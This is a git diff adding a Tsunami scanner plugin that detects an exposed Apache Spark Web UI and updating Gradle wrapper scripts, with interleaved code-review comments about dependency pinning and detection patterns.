+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew.bat b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_spark_cve_2022_33891/gradlew.bat +++ b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_spark_exposed_webui/README.md b/community/detectors/apache_spark_exposed_webui/README.md new file mode 100644 index 000000000..cc7b08b04 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/README.md 
@@ -0,0 +1,23 @@ +# Apache Sparks exposed Web UI + +This detector checks for an exposed Apache Spark Web UI. + +An Apache Spark Web Ui which is exposed to an attacker might disclose sensitive +information to them. An attacker can retrieve information such as the configured +workers and master node within the Apache Sparks environment. Furthermore, an +attacker gains access to the output logs of run tasks. This might disclose +sensitive information if a task is logging sensitive information during its +execution. + +The Web UI is exposed on the root path of the Apache Sparks instance. An +exemplary URI might look like the following: `http://:8080/` + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_spark_exposed_webui/build.gradle b/community/detectors/apache_spark_exposed_webui/build.gradle new file mode 100644 index 000000000..541624345 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/build.gradle 
@@ -0,0 +1,70 @@ +plugins { + id 'java' +} + +description = 'Tsunami VulnDetector plugin to detect an exposed Apache Spark Web UI.' +group 'com.google.tsunami' +version '1.0-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + okhttpVersion = '3.12.0' + autoValueVersion = '1.7' + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.auto.value:auto-value-annotations:${autoValueVersion}" + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + annotationProcessor "com.google.auto.value:auto-value:${autoValueVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation 
"com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..e6441136f Binary files /dev/null and b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/apache_spark_exposed_webui/gradlew b/community/detectors/apache_spark_exposed_webui/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/gradlew 
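Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block is a dynamic version, so the three `com.google.tsunami` artifacts this plugin compiles against can change between builds without any change to this file. Pinning it (`tsunamiVersion = '<pinned-release>'`, placeholder) or enabling Gradle dependency locking would make the build reproducible and the dependency change reviewable. `mavenLocal()` in `repositories` also lets the builder's local Maven repository satisfy any coordinate the two remote repositories do not serve, which is worth dropping for a jar that is loaded into a scanner. The same two lines appear in `community/detectors/argocd_exposed_ui/build.gradle` later in this diff.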
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_spark_exposed_webui/gradlew.bat b/community/detectors/apache_spark_exposed_webui/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_spark_exposed_webui/settings.gradle b/community/detectors/apache_spark_exposed_webui/settings.gradle new file mode 100644 index 000000000..8aaafed2c --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'apache_sparks_exposed_webui' + diff --git a/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetector.java b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetector.java new file mode 100644 index 000000000..c2af3f696 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetector.java 
@@ -0,0 +1,132 @@ +package com.google.tsunami.plugins.detectors.apachesparksexposedwebui; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.get; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import java.util.regex.Pattern; +import javax.inject.Inject; + +/** A Tsunami plugin for detecting an exposed Apache Spark Web UI. 
*/ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "ApacheSparksExposedWebuiVulnDetector", + version = "0.1", + description = + "This plugin detects an exposed Apache Spark Web UI which discloses information about the" + + " Apache Spark environment and its' tasks.", + author = "Timo Mueller (work@mtimo.de)", + bootstrapModule = ApacheSparksExposedWebuiVulnDetectorBootstrapModule.class) +public final class ApacheSparksExposedWebuiVulnDetector implements VulnDetector { + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private static final Pattern VULNERABILITY_RESPONSE_PATTERN_TENTATIVE = + Pattern.compile("Spark "); + private static final Pattern VULNERABILITY_RESPONSE_PATTERN_CONFIRMATION = + Pattern.compile("onClick=\"collapseTable\\('collapse-aggregated-"); + + @Inject + ApacheSparksExposedWebuiVulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) { + logger.atInfo().log("ApacheSparksExposedWebuiVulnDetector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + try { + HttpResponse response = + httpClient.send( + get(targetUri) + .setHeaders( + 
HttpHeaders.builder().addHeader("User-Agent", "TSUNAMI_SCANNER").build()) + .build(), + networkService); + if (response.status() == HttpStatus.OK && response.bodyString().isPresent()) { + String responseBody = response.bodyString().get(); + if (VULNERABILITY_RESPONSE_PATTERN_TENTATIVE.matcher(responseBody).find() + && VULNERABILITY_RESPONSE_PATTERN_CONFIRMATION.matcher(responseBody).find()) { + return true; + } + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + } + + return false; + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_WebUI")) + .setSeverity(Severity.MEDIUM) + .setTitle( + "Exposed Apache Spark UI which discloses information about the Apache Spark" + + " environment and its' tasks.") + .setDescription( + "An exposed Apache Spark Web UI provides attackers information about the Apache" + + " Spark UI and its' tasks. The disclosed information might leak other" + + " configured Apache Spark nodes and the output of previously run tasks." + + " Depending on the task, the output might contain sensitive information" + + " which was logged during the task execution.") + .setRecommendation( + "Don't expose the Apache Spark Web UI to unauthenticated attackers.")) + .build(); + } +} 
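Review bot: `isServiceVulnerable` decides on two body substrings from a single GET of the root URL, and `buildDetectionReport` then labels the result `VULNERABILITY_VERIFIED`; as the first pattern reads here (`Spark `, possibly with markup lost in this rendering) it adds little, so the finding appears to rest on the `collapseTable('collapse-aggregated-` marker alone. A comment above the two `Pattern` constants naming the page each marker comes from would let a maintainer re-check them when the UI changes, e.g. `// Marker 1: title of the Spark master/worker page; marker 2: table toggle on the same page (TODO confirm against a live instance)`. Separately, the injected `payloadGenerator` field is never read in this class and could be dropped from the constructor, and this file lacks the license header that the two other new Java files in this change carry.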
diff --git a/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorBootstrapModule.java b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorBootstrapModule.java
new file mode 100644
index 000000000..abe3173ce
--- /dev/null
+++ b/community/detectors/apache_spark_exposed_webui/src/main/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorBootstrapModule.java
@@ -0,0 +1,28 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.apachesparksexposedwebui;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/** A {@link PluginBootstrapModule} for {@link ApacheSparksExposedWebuiVulnDetector}. */
+public final class ApacheSparksExposedWebuiVulnDetectorBootstrapModule
+ extends PluginBootstrapModule {
+
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(ApacheSparksExposedWebuiVulnDetector.class);
+ }
+}
diff --git a/community/detectors/apache_spark_exposed_webui/src/test/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorTest.java b/community/detectors/apache_spark_exposed_webui/src/test/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorTest.java new file mode 100644 index 000000000..6d3d05ceb --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/src/test/java/com/google/tsunami/plugins/detectors/apachesparksexposedwebui/ApacheSparksExposedWebuiVulnDetectorTest.java 
@@ -0,0 +1,176 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.apachesparksexposedwebui; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import 
okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** tests for {@link ApacheSparksExposedWebuiVulnDetector}. */ +@RunWith(JUnit4.class) +public final class ApacheSparksExposedWebuiVulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private ApacheSparksExposedWebuiVulnDetector detector; + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().build(), + new ApacheSparksExposedWebuiVulnDetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws Exception { + mockWebServer.shutdown(); + } + + @Test + public void detect_ifVulnerable_reportsVuln() throws IOException { + mockWebServer.setDispatcher(new VulnerableEndpointDispatcher()); + mockWebServer.start(); + + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), 